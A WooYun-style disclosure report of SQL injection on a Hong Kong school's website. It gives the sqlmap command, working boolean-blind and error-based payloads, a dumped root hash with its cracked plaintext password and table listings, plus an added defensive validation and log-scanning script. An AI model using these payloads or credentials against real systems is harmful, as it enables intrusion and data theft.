Vulnerability summary

Defect ID: wooyun-2015-0149238

Title: SQL injection at a location on 香港啟思中學's website (DBA privileges / weak root password disclosed / 133 tables) (Hong Kong region)

Affected vendor: 香港啟思中學

Author: 路人甲

Submitted: 2015-10-25 10:07

Fixed: 2015-12-12 11:48

Published: 2015-12-12 11:48

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: handed over to a third-party partner organisation (HKCERT, the Hong Kong Computer Emergency Response Team Coordination Centre) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-10-25: Details sent to the vendor; awaiting vendor handling
2015-10-28: Vendor confirmed; details disclosed to the vendor only
2015-11-07: Details disclosed to core white hats and relevant domain experts
2015-11-17: Details disclosed to regular white hats
2015-11-27: Details disclosed to intern white hats
2015-12-12: Details disclosed to the public

Brief description:

SQL injection at a location on 香港啟思中學's website (DBA privileges / weak root password disclosed / 133 tables)

Detailed description:

Test URL: http://**.**.**.**/index.php?option=com_content&view=article&id=16&Itemid=96

python sqlmap.py -u "http://**.**.**.**/index.php?option=com_content&view=article&id=16&Itemid=96" -p id --technique=BE --random-agent --batch --current-user --is-dba --users --passwords

Proof of vulnerability:

---
Parameter: id (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: option=com_content&view=article&id=16 RLIKE (SELECT (CASE WHEN (4995=4995) THEN 16 ELSE 0x28 END))&Itemid=96
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: option=com_content&view=article&id=16 AND (SELECT 6720 FROM(SELECT COUNT(*),CONCAT(0x716b766b71,(SELECT (ELT(6720=6720,1))),0x716b6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&Itemid=96
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.4.16, Apache 2.2.15
back-end DBMS: MySQL 5.0
current user: 'root@localhost'
current user is DBA: True
database management system users [5]:
[*] ''@'localhost'
[*] ''@'**.**.**.**'
[*] 'root'@'**.**.**.**'
[*] 'root'@'localhost'
[*] 'root'@'**.**.**.**'
database management system users password hashes:
[*] root [2]:
password hash: *EB87920C7207E533743E4C5D8C6AF2CC61C71B35
clear-text password: maintain
password hash: NULL
available databases [4]:
[*] information_schema
[*] mysql
[*] schoolweb
[*] test
Database: schoolweb
[133 tables]
+-------------------------------+
| x3sug_ak_acl |
| x3sug_ak_profiles |
| x3sug_ak_stats |
| x3sug_ak_storage |
| x3sug_assets |
| x3sug_associations |
| x3sug_banner |
| x3sug_banner_clients |
| x3sug_banner_tracks |
| x3sug_bannerclient |
| x3sug_banners |
| x3sug_bannertrack |
| x3sug_categories |
| x3sug_contact_details |
| x3sug_content |
| x3sug_content_frontpage |
| x3sug_content_rating |
| x3sug_content_types |
| x3sug_contentitem_tag_map |
| x3sug_core_log_searches |
| x3sug_datasafe_pro |
| x3sug_eweather_cache |
| x3sug_eweather_locations |
| x3sug_eweather_prefs |
| x3sug_eweather_profiles |
| x3sug_export_categories |
| x3sug_export_content |
| x3sug_export_sections |
| x3sug_extensions |
| x3sug_fabanner |
| x3sug_fabannerin |
| x3sug_fabannerlang |
| x3sug_fabannerlocation |
| x3sug_faclient |
| x3sug_falink |
| x3sug_falocation |
| x3sug_fasize |
| x3sug_finder_filters |
| x3sug_finder_links |
| x3sug_finder_links_terms0 |
| x3sug_finder_links_terms1 |
| x3sug_finder_links_terms2 |
| x3sug_finder_links_terms3 |
| x3sug_finder_links_terms4 |
| x3sug_finder_links_terms5 |
| x3sug_finder_links_terms6 |
| x3sug_finder_links_terms7 |
| x3sug_finder_links_terms8 |
| x3sug_finder_links_terms9 |
| x3sug_finder_links_termsa |
| x3sug_finder_links_termsb |
| x3sug_finder_links_termsc |
| x3sug_finder_links_termsd |
| x3sug_finder_links_termse |
| x3sug_finder_links_termsf |
| x3sug_finder_taxonomy |
| x3sug_finder_taxonomy_map |
| x3sug_finder_terms |
| x3sug_finder_terms_common |
| x3sug_finder_tokens |
| x3sug_finder_tokens_aggregate |
| x3sug_finder_types |
| x3sug_flexbanners |
| x3sug_flexbannersclient |
| x3sug_flexbannersin |
| x3sug_flexbannerslink |
| x3sug_flexbannerslocations |
| x3sug_flexbannerssize |
| x3sug_gcalendar |
| x3sug_jce_extensions |
| x3sug_jce_groups |
| x3sug_jce_plugins |
| x3sug_jev_users |
| x3sug_jevents_categories |
| x3sug_jevents_exception |
| x3sug_jevents_icsfile |
| x3sug_jevents_repbyday |
| x3sug_jevents_repetition |
| x3sug_jevents_rrule |
| x3sug_jevents_vevdetail |
| x3sug_jevents_vevent |
| x3sug_k2_attachments |
| x3sug_k2_categories |
| x3sug_k2_comments |
| x3sug_k2_extra_fields |
| x3sug_k2_extra_fields_groups |
| x3sug_k2_items |
| x3sug_k2_rating |
| x3sug_k2_tags |
| x3sug_k2_tags_xref |
| x3sug_k2_user_groups |
| x3sug_k2_users |
| x3sug_languages |
| x3sug_menu |
| x3sug_menu_types |
| x3sug_messages |
| x3sug_messages_cfg |
| x3sug_migration_configuration |
| x3sug_modules |
| x3sug_modules_menu |
| x3sug_newsfeeds |
| x3sug_overrider |
| x3sug_postinstall_messages |
| x3sug_redirect_links |
| x3sug_rsbanners_ad |
| x3sug_rsbanners_adcat |
| x3sug_schemas |
| x3sug_sections |
| x3sug_sembookings |
| x3sug_seminar |
| x3sug_semnumber |
| x3sug_session |
| x3sug_stats_agents |
| x3sug_swmenu_config |
| x3sug_swmenu_extended |
| x3sug_swmenufree_styles |
| x3sug_tags |
| x3sug_template_styles |
| x3sug_ucm_base |
| x3sug_ucm_content |
| x3sug_ucm_history |
| x3sug_update_sites |
| x3sug_update_sites_extensions |
| x3sug_updates |
| x3sug_user_keys |
| x3sug_user_notes |
| x3sug_user_profiles |
| x3sug_user_usergroup_map |
| x3sug_usergroups |
| x3sug_users |
| x3sug_viewlevels |
| x3sug_weblinks |
| x3sug_wf_profiles |
+-------------------------------+
Database: schoolweb
Table: x3sug_user_keys
[7 columns]
+----------+------------------+
| Column | Type |
+----------+------------------+
| time | varchar(200) |
| id | int(10) unsigned |
| invalid | tinyint(4) |
| series | varchar(255) |
| token | varchar(255) |
| uastring | varchar(255) |
| user_id | varchar(255) |
+----------+------------------+

Fix recommendation:

Add input filtering.
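The recommended fix is strict input validation: the injected `id` parameter of the article view only ever needs to hold a decimal integer, so an allow-list check (rather than a blacklist of SQL keywords) rejects every payload quoted above. The added example below is not part of the original report or of the affected site's code; it applies that allow-list check to the `id` value of constructed Apache access-log lines modelled on the report's two sqlmap payloads and tags each rejected value with the sqlmap technique it resembles. The client address and log lines are constructed placeholders.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed access-log lines modelled on the payloads quoted in this report
# (placeholder client address; these are not the affected server's real logs).
SAMPLE_LOG = """\
203.0.113.5 - - [25/Oct/2015:10:07:01 +0800] "GET /index.php?option=com_content&view=article&id=16&Itemid=96 HTTP/1.1" 200 5120
203.0.113.5 - - [25/Oct/2015:10:07:02 +0800] "GET /index.php?option=com_content&view=article&id=16%20RLIKE%20%28SELECT%20%28CASE%20WHEN%20%284995%3D4995%29%20THEN%2016%20ELSE%200x28%20END%29%29&Itemid=96 HTTP/1.1" 200 5120
203.0.113.5 - - [25/Oct/2015:10:07:03 +0800] "GET /index.php?option=com_content&view=article&id=16%20AND%20%28SELECT%206720%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x716b766b71%2C%28SELECT%20%28ELT%286720%3D6720%2C1%29%29%29%2C0x716b6b7871%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29&Itemid=96 HTTP/1.1" 500 812
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# Coarse signatures for the two sqlmap techniques seen in the report's output.
SIGNATURES = {
    "boolean-based blind": re.compile(r"\bRLIKE\b.*\bCASE\s+WHEN\b", re.I),
    "error-based": re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
}

def validate_id(raw):
    """Allow-list check: an article id must be a plain decimal integer.
    Casting to int server-side (the actual fix) rejects every payload above."""
    return raw.strip().isdigit()

def classify(raw):
    for name, pat in SIGNATURES.items():
        if pat.search(raw):
            return name
    return "unknown"

def scan_log(text):
    """Return (decoded id value, technique) for every request whose id fails validation."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        for raw in parse_qs(query, keep_blank_values=True).get("id", []):
            decoded = unquote_plus(raw)  # parse_qs decoded once; catch double encoding
            if not validate_id(decoded):
                findings.append((decoded, classify(decoded)))
    return findings

if __name__ == "__main__":
    for value, kind in scan_log(SAMPLE_LOG):
        print(f"[{kind}] id={value[:60]}")
```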

Copyright notice: please credit the source when reproducing: 路人甲@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 12

Confirmed: 2015-10-28 11:47

Vendor reply:

The incident has been reported to the relevant organisation.

Latest status:

None yet